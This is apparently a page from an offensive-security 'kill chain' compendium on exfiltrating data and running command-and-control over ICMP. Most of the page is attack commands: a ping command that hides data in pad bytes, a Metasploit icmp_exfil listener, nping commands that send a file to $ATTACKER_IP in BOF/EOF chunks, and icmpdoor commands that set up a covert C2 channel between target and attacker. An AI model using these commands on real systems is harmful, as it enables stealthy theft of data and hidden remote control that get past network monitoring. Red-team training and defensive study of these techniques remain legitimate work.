killchain-compendium/Exfiltration/ICMP.md

ICMP Exfiltration

• ICMP Types

• Type 0, which is Echo Reply contains an optional data field inside the header

 0                   1                   2                   3  
 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
|      Type     |      Code     |            Checksum           |
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
|           Identifier          |        Sequence Number        |
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
|                                                               |
+                              Data                             +
|                                                               |
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+

Usage

• The Pattern parameter can be used to pad the bytes. From the manual

 -p pattern
           You may specify up to 16 “pad” bytes to fill out the packet you send. This is useful for diagnosing
           data-dependent problems in a network. For example, -p ff will cause the sent packet to be filled with all ones.

• Pad hex values

ping $TARGET_IP -c 1 -p $(echo "data payload" | xxd -p )

Metasploit ICMP Exfiltration

• Awaiting ICMP data on Attacker

use auxiliary/server/icmp_exfil
set BPF_FILTER icmp and not src $ATTACKER_IP
set interface <interface>
run

• Exfiltrating from target via ping shown above or use nping
• Starting the transmission via nping and BOF

sudo nping --icmp -c 1 $ATTACKER_IP --data-string "BOFpayload.txt"
sudo nping --icmp -c 1 $ATTACKER_IP --data-string "actual payload"
sudo nping --icmp -c 1 $ATTACKER_IP --data-string "EOF"

C2 over ICMP

• Use krabelize's ICMPdoor

• On target

sudo icmpdoor -i <interface> -d $ATTACKER_IP

• On attacker

sudo icmp-cnc -i <interface> -d $TARGET_IP